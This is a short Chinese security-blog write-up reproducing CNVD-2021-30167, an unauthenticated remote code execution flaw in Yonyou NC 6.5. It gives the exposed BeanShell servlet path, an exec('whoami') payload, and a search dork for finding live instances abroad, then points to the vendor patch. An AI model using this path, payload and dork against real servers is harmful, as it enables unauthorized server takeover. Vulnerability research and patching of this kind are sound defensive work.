CNVD-2021-30167：用友NC BeanShell RCE复现

1337163122

​ CNVD-2021-30167：用友NC BeanShell RCE复现原创 蚂蚁 [url=]Timeline Sec[/url] 昨天
收录于话题
#漏洞复现文章合集
93个

上方蓝色字体关注我们，一起学安全！
作者：蚂蚁@Timeline Sec
本文字数：361
阅读时长：2～3min
声明：请勿用作违法用途，否则后果自负

0x01 简介

用友NC是面向集团企业的管理软件，其在同类市场占有率中达到亚太第一。

0x02 漏洞概述

用友NC由于对外开放了BeanShell接口，攻击者可以在未授权的情况下直接访问该接口，并构造恶意数据执行任意代码从而获取服务器权限。

0x03 影响版本

用友NC6.5版本

0x04 环境搭建

国外在线环境

       
• 
  

title=="YONYOU NC" && country="SG"

​

0x05 漏洞复现

1、访问
/servlet/~ic/bsh.servlet.BshServlet
得到如图：

​

2、我们发现这里有执行代码的接口我们输入payload如：exec("whoami");即可看到命令执行成功

​

0x06 修复方式

该漏洞为第三方jar包漏洞导致，用友NC官方已发布安全补丁，建议使用该产品的用户及时安装该漏洞补丁包。

补丁下载链接：
​

1. http://umc.yonyou.com/ump/querypatchdetailedmng? PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19

复制代码